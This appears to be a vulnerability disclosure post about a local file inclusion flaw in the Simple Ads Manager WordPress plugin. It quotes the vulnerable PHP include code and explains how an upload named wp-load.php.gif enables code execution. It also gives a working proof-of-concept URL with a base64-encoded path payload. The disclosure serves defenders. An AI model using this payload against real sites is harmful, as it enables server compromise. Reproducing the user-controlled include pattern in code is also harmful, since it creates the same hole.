In a previous post we looked at a local file inclusion (LFI) vulnerability in the plugin SAM Pro (Free Edition), since that is described as successor to Simple Ads Manager (the plugin is currently removed from the Plugin Directory) we took a look to see if it also had the same vulnerability. As it turned out the plugin was not really vulnerable until the same change made to try to fix the issue in SAM Pro (Free Edition), was made to this plugin.

In the prior version, 2.9.8.125, you can see that the file to be included was not user specified (as seen in the file /sam-ajax-admin.php):

13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

function samCheckLevel() {
	$level = 0;
	$upPath = '';
	$file = 'wp-load.php';
	$fe = false;
 
	while(!$fe && $level < 6) {
		$fe = file_exists($upPath . $file);
		if(!$fe) {
			$upPath .= '../';
			$level++;
		}
	}
	if($fe) return realpath($upPath . $file);
	else return dirname(dirname(dirname(dirname(__FILE__))));
}
 
$wpLoadPath = samCheckLevel();
 
ini_set('html_errors', 0);
$notShortInit = array('load_combo_data', 'load_users', 'load_authors');
 
$validUri = '';
$validRequest = false;
if( ! in_array($_REQUEST['action'], $notShortInit)) define('SHORTINIT', true);
 
require_once( $wpLoadPath );

The only way you can a local file inclusion issue is if you could get a file named “wp-load.php” in the directory /wp-content/, /wp-content/plugins, or /wp-content/plugins/simple-ads-manager. If you could do that you could likely just call the file directory instead of having to use a local file inclusion (LFI) vulnerability to do the same.

In most recent version, 2.10.0.130, it was changed to match the code in SAM Pro (Free Edition):

11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

$body = 'load';
 
if (!isset( $_REQUEST['action'])) die('-1');
if (!isset( $_REQUEST['wap'] )) die('-2');
 
$prefix = 'wp';
$suffix = 'php';
 
$wap      = ( isset( $_REQUEST['wap'] ) ) ? base64_decode( $_REQUEST['wap'] ) : null;
$mlf = "{$prefix}-{$body}.{$suffix}";
$rightWap = ( is_null( $wap ) ) ? false : strpos( $wap, $mlf );
if ( $rightWap === false ) {
	exit;
}
 
$wpLoadPath = ( is_null( $wap ) ) ? false : $wap;
 
if ( ! $wpLoadPath ) {
	die( '-3' );
}
 
ini_set('html_errors', 0);
$notShortInit = array('load_combo_data', 'load_users', 'load_authors');
 
$validUri = '';
$validRequest = false;
if( ! in_array($_REQUEST['action'], $notShortInit)) define('SHORTINIT', true);
 
require_once( $wpLoadPath );

The only limitation you have with that is that the file you specify to be included has to include “wp-load.php” somewhere in it, of which there are multiple ways you could accomplish that. One being the example we mentioned in the other post, if you could upload media on the website then you could upload a file name wp-load.php.gif with malicious PHP content. WordPress will rename that to wp-load.php_.gif, but otherwise leave it unchanged.

Proof of Concept

The following proof of concept will cause a file located at /wp-content/uploads/2016/10/wp-load.php_.gif to be included.

Make sure to replace “[path to WordPress]” with the location of WordPress.

http://[path to WordPress]/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?action=NA&wap=Li4vLi4vdXBsb2Fkcy8yMDE2LzEwL3dwLWxvYWQucGhwXy5naWY=

Timeline

• 10/26/2016 – Developer notified of issue in SAM Pro (Free Edition).

Concerned About The Security of the Plugins You Use?